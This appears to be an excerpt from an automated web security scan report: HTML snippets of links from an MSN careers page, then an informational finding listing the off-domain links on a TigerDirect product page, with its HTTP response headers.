class="MSNdMSNME_1">Sign in</a>
...[SNIP]...
<li class="MSNfirst MSNselected"><a href="http://health.msn.com">health</a></li><li><a
href="http://moneycentral.redacted">money</a></li><li><a href="http://www.bing.com/travel?cid=msn_careers">
travel</a>
...[SNIP]...
<li><a href="http://tech.redacted/">tech</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://mail.live.com"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="Hotmail" /><span>
...[SNIP]...
<li><a href="http://im.live.com/messenger/im/home/?source=MSNTDLINK" id="MSNmsg"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="Messenger" /><span>
...[SNIP]...
<li><a href="http://my.redacted"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="My MSN" /><span>
...[SNIP]...
<li class="MSNlast"><a href="http://ie8.redacted/microsoft/internet-explorer-8/en-us/ie8.aspx?ocid=B037MSN55C0403A"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="Internet Explorer 8" /><span>
...[SNIP]...
<li class="MSNfirst"><a href="http://www.bing.com/travel?cid=msn_careers">Airfares & Travel</a>
...[SNIP]...
<li><a href="http://autos.msn.com/default.aspx">Autos</a></li><li><a href="http://careers.msn.com">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://cityguides.redacted">City Guides</a>
...[SNIP]...
<li class="MSNlast"><a href="http://msn.match.com/index.aspx?TrackingID=516163&BannerID=543351 ">Dating & Personals</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://msn.delish.com/">Food & Entertaining</a>
...[SNIP]...
<li><a href="http://games.msn.com">Games</a></li><li><a href="http://health.msn.com">Health & Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS">Horoscopes</a></li><li class="MSNlast"><a href="http://lifestyle.redacted/default.aspx">Lifestyle</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://maps.live.com/default.aspx?wip=2&v=2&rtp=~&FORM=MSNH">Maps & Directions</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/home.asp">Money</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com">Music</a></li><li class="MSNlast"><a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://realestate.redacted">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://g.redacted/0AD00036/931292.1??HCType=1&CID=931292&PG=SHPHDR">Shopping</a></li><li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://tech.redacted">Tech & Gadgets</a>
...[SNIP]...
<li class="MSNlast"><a href="http://tv.redacted">TV</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://weather.msn.com">Weather</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.wonderwall.com/">Wonderwall</a></li><li><a href="http://yellowpages.redacted">Yellow Pages</a>
...[SNIP]...
<li class="MSNlast"><a href="http://specials.msn.com/alphabet.aspx">MSN Directory</a>
...[SNIP]...
<div id="MSNlogo">
<a href="http://www.redacted">
<img src="http://blstc.redacted/br/gbl/lg/1/l/msft.gif" alt="go to redacted"
width="118" height="35" /></a><a class="MSNname" href="http://careers.msn.com">careers</a>
...[SNIP]...
<span><a href="http://latino.msn.com/empleos/">Español</a>
...[SNIP]...
<div class="facebook_like"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.theworkbuzz.com%2Ffun-stuff%2Fyour-work-soundtrack%2F&layout=button_count&show_faces=false&width=130&action=recommend&font=arial&colorscheme=light&height=20" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...
<div class="tweet_button">
                    <a href="http://twitter.com/share?url=http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/&via=careerbuilder&count=horizontal" class="twitter-share-button">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="linkedin_share">
                   <script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
</a>Listening to the right song can make you feel better about anything, like <a href="http://www.fitnessmagazine.com/workout/music/popular-playlists/the-fitness-top-100-workout-songs/">running on a treadmill</a>, <a href="http://www.youtube.com/watch?v=q8zx68HENIA">being broke</a>..or <a href="http://www.youtube.com/watch?v=i3MXiTeH_Pg&ob=av2em">not getting winked at on Match.com</a>...Fortunately, since we all get a little grumpy about <a href="http://www.youtube.com/watch?v=9N2CANatVYQ" target="_blank">workin’ for a livin’</a>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fbang-the-drum-all-day%252Fid107636259%253Fi%253D107636085%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Bang the Drum All Day - The Very Best of Todd Rundgren" /></a>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fmusique-vol-1-1993-2005%252Fid133708728%253Fuo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Musique, Vol. 1 (1993-2005) - Daft Punk" /></a>
...[SNIP]...
</strong><a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Ftake-this-job-and-shove-it%252Fid18453611%253Fi%253D18453581%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><strong><img src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Take This Job and Shove It - Johnny Paycheck: 15 All-Time Greatest Hits (Re-Recorded Versions)" /></strong>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fjust-who-i-am-poets-pirates%252Fid262139788%253Fuo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Just Who I Am: Poets & Pirates - Kenny Chesney" /></a>
...[SNIP]...
</strong><a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fa-hard-days-night%252Fid402060584%253Fi%253D402060914%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="A Hard Day's Night - A Hard Day's Night" /></a>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fshe-works-hard-for-the-money%252Fid1953992%253Fuo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="She Works Hard for the Money - Donna Summer" /></a>
...[SNIP]...
</strong><a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Ffor-the-love-of-money%252Fid158960620%253Fi%253D158960641%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><strong><img src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="For the Love of Money - The Essential O'Jays" /></strong>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fworking-on-the-highway%252Fid203708420%253Fi%253D203708785%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Working On the Highway - Born In the U.S.A." /></a>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fman-in-the-mirror%252Fid159292399%253Fi%253D159294478%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Man In the Mirror - The Essential Michael Jackson" /></a>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fmanic-monday%252Fid200007310%253Fi%253D200007628%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Manic Monday - Bangles: Greatest Hits" /></a>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fits-my-life%252Fid397237803%253Fi%253D397237927%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="It's My Life - Bon Jovi Greatest Hits - The Ultimate Collection" /></a>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fbig-boss-man%252Fid283284190%253Fi%253D283284203%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Big Boss Man - Big Boss Man" /></a>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fforty-hour-week-for-a-livin%252Fid271622685%253Fi%253D271622700%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Forty Hour Week (For a Livin') - 40 Hour Week" /></a>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Ftakin-care-of-business%252Fid342122%253Fi%253D342120%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Takin' Care of Business - Bachman-Turner Overdrive 2" /></a>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fnothin-but-a-good-time%252Fid254242268%253Fi%253D254243956%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Nothin' But a Good Time - The Best of Poison - 20 Years of Rock (Remastered)" /></a>
...[SNIP]...
</div>
<script type="text/javascript" charset="utf-8" src="http://w.sharethis.com/widget/?wp=2.6.1&publisher=16298438-73ee-4f37-8234-2c6423690e18"></script>
...[SNIP]...
<div class="textwidget"><a href="http://www.careerbuilder.com?lr=workbuzz&siteid=rkbuzzlg" alt="CareerBuilder.com"><img src="http://img.icbdr.com/images/plink/logos/powered_by_cb_logo.gif" border="0" /></a>
...[SNIP]...
<li id="twitter-follow"><a href="http://twitter.com/CareerBuilder" rel="external">Twitter</a></li><li id="facebook-follow"><a href="http://www.facebook.com/careerbuilder" rel="external">Facebook</a>
...[SNIP]...
<br>
<img src=http://img.icbdr.com/images/pixel.gif width=1 height=1 vspace=2><br>
...[SNIP]...
<td style=padding-top:8px;>  - <a href="http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx?lr=workbuzz&siteid=workbuzz003">
           <font face="arial,helvetica" size="1" style="font-size:11px;" color="000066">
...[SNIP]...
<td style=padding-bottom:12px;>  - <a href="http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx?lr=workbuzz&siteid=workbuzz003"><font face="arial,helvetica" size="1" style="font-size:11px;" color="000066">
...[SNIP]...
<div class="textwidget"><a href="http://alltop.com/"><img src="http://badges.alltop.com/images/alltop_170x30_we2.jpg" width="170" height="30" alt="Alltop. We're kind of a big deal." /></a>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<div style="font-size:8px; padding-left:10px"><a href="http://www.facebook.com/careerbuilder">CareerBuilder on Facebook</a>
...[SNIP]...
<li><a href="http://www.blackcareers.com/" title="Black Careers">Black Careers</a>
...[SNIP]...
<li><a href="http://www.careerrookie.com/" title="CBcampus">Career Rookie</a>
...[SNIP]...
<li><a href="http://www.cbinstitute.com" title="CBInstitute">CBInstitute</a>
...[SNIP]...
<li><a href="http://www.cbresume.com" title="cbResume">cbResume</a></li>
<li><a href="http://www.CBSalary.com" title="CBsalary">CBsalary.com</a>
...[SNIP]...
<li><a href="http://www.careerpath.com" title="CareerPath">CareerPath</a>
...[SNIP]...
<li><a href="http://www.degreedriven.com" title="DegreeDriven">DegreeDriven</a>
...[SNIP]...
<li><a href="http://www.empleoscb.com" title="Empleos">Empleoscb</a></li>
<li><a href="http://www.employmentspot.com" title="Employment Spot">Employment Spot</a>
...[SNIP]...
<li><a href="http://www.jobs.net" title="Jobs.net">Jobs.net</a></li>
<li><a href="http://www.personified.com/">Personified</a>
...[SNIP]...
<li><a href="http://www.primecb.com/">PrimeCB</a></li>
<li><a href="http://www.truecareers.com" title="True Careers">True Careers</a>
...[SNIP]...
<li><a href="http://workinretail.com" title="WorkInRetail">WorkInRetail</a>
...[SNIP]...
<li><a href="http://www.thehiringsite.com/">The Hiring Site</a>
...[SNIP]...
<li><a href="http://askamanager.blogspot.com/">Ask A Manager</a>
...[SNIP]...
<li><a href="http://www.spherioncareerblog.com/">Big Time</a></li>
<li><a href="http://www.blogher.com/topic/business-career-personal-finance">BlogHer</a></li>
<li><a href="http://www.brazencareerist.com/">Brazen Careerist</a>
...[SNIP]...
<li><a href="http://www.careerhubblog.com/">CareerHub</a></li>
<li><a href="http://careerealism.wordpress.com/" title="Careerealism">Careerealism</a>
...[SNIP]...
<li><a href="http://blogs.wsj.com/laidoff/?mod=blogmod" target="_blank">CareerJournal: Laid Off and Looking</a>
...[SNIP]...
<li><a href="http://manpowerblogs.com/holmes/">Contemporary Working</a>
...[SNIP]...
<li><a href="http://www.employmentblawg.com/">Employment Blawg</a>
...[SNIP]...
<li><a href="http://evilhrlady.blogspot.com/">Evil HR Lady</a>
...[SNIP]...
<li><a href="http://www.fastcompany.com/blogs">Fast Company</a>
...[SNIP]...
<li><a href="http://www.fistfuloftalent.com/">Fistful of Talent</a>
...[SNIP]...
<li><a href="http://blog.generationrelations.com/" title="Generation Relations">Generation Relations</a>
...[SNIP]...
<li><a href="http://hrminion.blogspot.com/">HR Minion</a></li>
<li><a href="http://hrwench.blogspot.com/">HR Wench</a></li>
<li><a href="http://www.huffingtonpost.com/business/">HuffPost Business Blogs</a>
...[SNIP]...
<li><a href="http://www.humancapitalist.com/">Human Capitalist</a>
...[SNIP]...
<li><a href="http://www.jibberjobber.com/login.php">Jibber Jobber</a>
...[SNIP]...
<li><a href="http://www.jobsearchmarketing.com/">JobSearch Marketing Blog</a>
...[SNIP]...
<li><a href="http://www.jtodonnell.com/wordpress/" title="Career Insights">J.T. O’Donnell: Career Insights</a>
...[SNIP]...
<li><a href="http://keppiecareers.wordpress.com/">Keppie Careers</a>
...[SNIP]...
<li><a href="http://www.leapwalking.com/">Leap Walking</a>
...[SNIP]...
<li><a href="http://www.momsrising.org/momsblogging/">Moms Rising</a>
...[SNIP]...
<li><a href="http://blogs.msdn.com/heatherleigh/default.aspx">One Louder</a>
...[SNIP]...
<li><a href="http://www.usnews.com/blogs/outside-voices-careers/index.html">Outside Voices: Careers</a>
...[SNIP]...
<li><a href="http://blog.penelopetrunk.com/">Penelope Trunk</a>
...[SNIP]...
<li><a href="http://personalbrandingblog.wordpress.com/">Personal Branding</a>
...[SNIP]...
<li><a href="http://punkrockhr.com/">Punk Rock HR</a>
...[SNIP]...
<li><a href="http://sethgodin.typepad.com/" title="Seth Godin">Seth Godin</a>
...[SNIP]...
<li><a href="http://shiftingcareers.blogs.nytimes.com/">Shifting Careers</a>
...[SNIP]...
<li><a href="http://www.thefutureofwork.net/blog/">The Future of Work</a>
...[SNIP]...
<li><a href="http://alexandralevit.typepad.com" rel="colleague" target="_blank">Water Cooler Wisdom</a>
...[SNIP]...
<li><a href="http://blogs.abcnews.com/womenomics/" title="ABC News – Womenomics">Womenomics</a>
...[SNIP]...
<p>© Copyright <a href="http://www.careerbuilder.com/?SiteId=workbuzz004">CareerBuilder.com</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.wildfireapp.com/website/302/companies/130300/widget_loader.js"></script>
...[SNIP]...
<li class="MSNfirst"><a href="http://g.redacted/2privacy/enus">MSN privacy</a>
...[SNIP]...
<li><a
href="http://g.redacted/0TO_/enus">Legal</a></li><li><a href="http://advertising.redacted/home/home.asp">
Advertise</a>
...[SNIP]...
<li class="last"><a href="http://rss.redacted">RSS</a>
...[SNIP]...
<li class="MSNfirst"><a onclick="return Msn.Navigation.OpenPopup(this,'width=800,height=600,resizeable=no,status=no,titlebar=no,toolbar=no')"
href="http://careers.msn.com/help.aspx">Help</a></li><li class="MSNlast"><a href="https://feedback.redacted/default.aspx?productkey=careers&mkt=en-us">Feedback</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-803759h&cg=0&cc=1&ts=noscript"
width="1" height="1" alt="" />
</div>
...[SNIP]...

22.489. http://www.tigerdirect.com/applications/SearchTools/item-details.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tigerdirect.com
Path:	/applications/SearchTools/item-details.asp

Issue detail

The page was loaded from a URL containing a query string:

http://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/tigerdirect.com/Section_2_House;sz=977x40;abr=!ie4;abr=!ie5;abr=!ie6;ord=[timestamp]?
http://ad.doubleclick.net/ad/tigerdirect.com/Section_2_House;sz=977x40;ord=[timestamp]?
http://ad.doubleclick.net/adi/tigerdirect.com/Section_2_House;sz=977x40;ord=[timestamp]?
http://ad.doubleclick.net/jump/tigerdirect.com/Section_2_House;sz=977x40;abr=!ie4;abr=!ie5;abr=!ie6;ord=[timestamp]?
http://ad.doubleclick.net/jump/tigerdirect.com/Section_2_House;sz=977x40;ord=[timestamp]?
http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call01-jfwd.jpg
http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call02-jfwd.jpg
http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call03-jfwd.jpg
http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call04-jfwd.jpg
http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call05-jfwd.jpg
http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call06-jfwd.jpg
http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call07-jfwd.jpg
http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call08-jfwd.jpg
http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call09-jfwd.jpg
http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call10-jfwd.jpg
http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call11-jfwd.jpg
http://images.highspeedbackbone.net/SKUimages/gallery/large/S203-2293-call12-jfwd.jpg
http://images.highspeedbackbone.net/VendorLogos/samsung_logo.gif
http://images.highspeedbackbone.net/campaigns/yamaha/images/spacer.gif
http://images.highspeedbackbone.net/dealday/footer_B56-1006.jpg
http://images.highspeedbackbone.net/dealday/footer_D29-1026.jpg
http://images.highspeedbackbone.net/dealday/footer_D700-5052.jpg
http://images.highspeedbackbone.net/dealday/footer_H450-8216.jpg
http://images.highspeedbackbone.net/dealday/footer_TSD-500AAKS.jpg
http://images.highspeedbackbone.net/footer/BR_2010.gif
http://images.highspeedbackbone.net/footer/country_icons_18.gif
http://images.highspeedbackbone.net/footer/country_icons_19.gif
http://images.highspeedbackbone.net/footer/country_icons_20.gif
http://images.highspeedbackbone.net/footer/country_icons_21.gif
http://images.highspeedbackbone.net/footer/country_icons_22.gif
http://images.highspeedbackbone.net/footer/country_icons_23.gif
http://images.highspeedbackbone.net/footer/country_icons_24.gif
http://images.highspeedbackbone.net/footer/country_icons_25.gif
http://images.highspeedbackbone.net/footer/country_icons_26.gif
http://images.highspeedbackbone.net/footer/country_icons_27.gif
http://images.highspeedbackbone.net/footer/country_icons_28.jpg
http://images.highspeedbackbone.net/footer/country_icons_29.gif
http://images.highspeedbackbone.net/footer/country_icons_30.gif
http://images.highspeedbackbone.net/footer/country_icons_31.gif
http://images.highspeedbackbone.net/footer/paypal_logo.gif
http://images.highspeedbackbone.net/footerus/Newfooter/delicious.gif
http://images.highspeedbackbone.net/footerus/Newfooter/digg.gif
http://images.highspeedbackbone.net/footerus/Newfooter/facebook.gif
http://images.highspeedbackbone.net/footerus/Newfooter/favorites2.gif
http://images.highspeedbackbone.net/footerus/Newfooter/furl.gif
http://images.highspeedbackbone.net/footerus/Newfooter/google.gif
http://images.highspeedbackbone.net/footerus/Newfooter/netscape.gif
http://images.highspeedbackbone.net/footerus/Newfooter/phone.gif
http://images.highspeedbackbone.net/footerus/Newfooter/reddit.gif
http://images.highspeedbackbone.net/footerus/Newfooter/slashdot.gif
http://images.highspeedbackbone.net/footerus/Newfooter/spurl.gif
http://images.highspeedbackbone.net/footerus/Newfooter/su.gif
http://images.highspeedbackbone.net/footerus/Newfooter/systemax.jpg
http://images.highspeedbackbone.net/footerus/Newfooter/technorati.gif
http://images.highspeedbackbone.net/footerus/Newfooter/trustwave_logo.gif
http://images.highspeedbackbone.net/footerus/Newfooter/verisign.gif
http://images.highspeedbackbone.net/footerus/clickratingsm.gif
http://images.highspeedbackbone.net/frontproducts/greybubblearrow.gif
http://images.highspeedbackbone.net/homepage/add.gif
http://images.highspeedbackbone.net/homepage/bluepixel.gif
http://images.highspeedbackbone.net/homepage/clearpixel.gif
http://images.highspeedbackbone.net/homepage/help_icon.gif
http://images.highspeedbackbone.net/homepage/icons_01.gif
http://images.highspeedbackbone.net/homepage/icons_02.gif
http://images.highspeedbackbone.net/homepage/icons_03.gif
http://images.highspeedbackbone.net/homepage/icons_04.gif
http://images.highspeedbackbone.net/homepage/promotions/exclusive_24hour/closeBtn_grey.jpg
http://images.highspeedbackbone.net/homepage/promotions/exclusive_24hour/closeButton.png
http://images.highspeedbackbone.net/homepage/promotions/exclusive_24hour/nothanksBtn_blue.jpg
http://images.highspeedbackbone.net/homepage/promotions/exclusive_24hour/tigerLogo_overlay.png
http://images.highspeedbackbone.net/homepage/ups_logo.gif
http://images.highspeedbackbone.net/item-details/Button1_WriteReview.gif
http://images.highspeedbackbone.net/item-details/addtocart.jpg
http://images.highspeedbackbone.net/item-details/bbox_bar.gif
http://images.highspeedbackbone.net/item-details/bbox_bg.gif
http://images.highspeedbackbone.net/item-details/clearpixel.gif
http://images.highspeedbackbone.net/item-details/duopixel.gif
http://images.highspeedbackbone.net/item-details/extraprotection.jpg
http://images.highspeedbackbone.net/itemDetails/bundleline.jpg
http://images.highspeedbackbone.net/itemDetails/tech/bluecleaner2.jpg
http://images.highspeedbackbone.net/itemDetails/tech/dualmonitors88.jpg
http://images.highspeedbackbone.net/itemDetails/tech/techtip.jpg
http://images.highspeedbackbone.net/itemDetails/techspedia/button.jpg
http://images.highspeedbackbone.net/itemDetails/techspedia/techspediaTLCa.jpg
http://images.highspeedbackbone.net/itemdetails/0_3.gif
http://images.highspeedbackbone.net/itemdetails/11_1.gif
http://images.highspeedbackbone.net/itemdetails/14_1.gif
http://images.highspeedbackbone.net/itemdetails/1_1.gif
http://images.highspeedbackbone.net/itemdetails/7_1.gif
http://images.highspeedbackbone.net/itemdetails/infotable_rightside1.gif
http://images.highspeedbackbone.net/itemdetails/tab13_0.gif
http://images.highspeedbackbone.net/itemdetails/tab30day-b.gif
http://images.highspeedbackbone.net/main/buynow_sm.gif
http://images.highspeedbackbone.net/main/buynow_sp_sm.gif
http://images.highspeedbackbone.net/main/gfx-blkbullet.jpg
http://images.highspeedbackbone.net/main/icon_rss.gif
http://images.highspeedbackbone.net/main/pixel-clr.gif
http://images.highspeedbackbone.net/masthead/bluelogo.gif
http://images.highspeedbackbone.net/mastheadusb/backsrch.gif
http://images.highspeedbackbone.net/mastheadusb/cartd.gif
http://images.highspeedbackbone.net/ratingstars/star8.gif
http://images.highspeedbackbone.net/ratingstars/star9.gif
http://images.highspeedbackbone.net/refresh.gif
http://images.highspeedbackbone.net/rightnav/liveHelpIcon160.jpg
http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-01.jpg
http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-02.jpg
http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-03.jpg
http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-04.jpg
http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-05.jpg
http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-06.jpg
http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg
http://images.highspeedbackbone.net/skuimages/small/A179-2264-main02-am.jpg
http://images.highspeedbackbone.net/skuimages/small/A204-2220-main03-am.jpg
http://images.highspeedbackbone.net/skuimages/small/A204-2222-mainv01-ec.jpg
http://images.highspeedbackbone.net/skuimages/small/E145-0452-Main-01-JH.jpg
http://images.highspeedbackbone.net/skuimages/small/H24-2206-main002-am.jpg
http://images.highspeedbackbone.net/skuimages/small/P16-40921-mainx-ac.jpg
http://images.highspeedbackbone.net/skuimages/small/P16-40922-mainx-hm.jpg
http://images.highspeedbackbone.net/skuimages/small/S123-2002-main01-am.jpg
http://images.highspeedbackbone.net/skuimages/small/S123-2020-main-or.jpg
http://images.highspeedbackbone.net/skuimages/small/U12-40512-Main-sp.jpg
http://images.highspeedbackbone.net/skuimages/small/U12-40513_main_image001_im.jpg
http://images.highspeedbackbone.net/skuimages/small/U12-40521-Main-sp.jpg
http://images.highspeedbackbone.net/skuimages/small/U12-40889-main01-mc.jpg
http://images.highspeedbackbone.net/skuimages/small/ULT40289_main_image001_im.jpg
http://images.highspeedbackbone.net/skuimages/small/V18-2238-main03-am.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.highspeedbackbone.net/html/guide_dual_monitors.html
http://tigerdirect.iapplicants.com/
http://www.bizrateinsights.com/2010-coe
http://www.facebook.com/tigerdirect
http://www.google.com/jsapi
http://www.misco.at/
http://www.misco.be/
http://www.misco.ch/
http://www.misco.co.uk/
http://www.misco.de/
http://www.misco.es/
http://www.misco.fr/
http://www.misco.ie/
http://www.misco.it/
http://www.misco.nl/
http://www.misco.pt/
http://www.misco.se/
http://www.seflorida.bbb.org/BusinessReport.aspx?CompanyID=27000500&source=ctc
http://www.systemax.com/
http://www.tigerdirect.ca/
http://www.twitter.com/tigerdirect
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.TIGERDIRECT.COM&lang=en
https://sealserver.trustkeeper.net/compliance/cert.php?code=ea97a8b6d8d755f41b78d04aa242d7f1&style=normal&size=105x54&language=en

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA04B
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 02:03:52 GMT
Connection: close
Connection: Transfer-Encoding
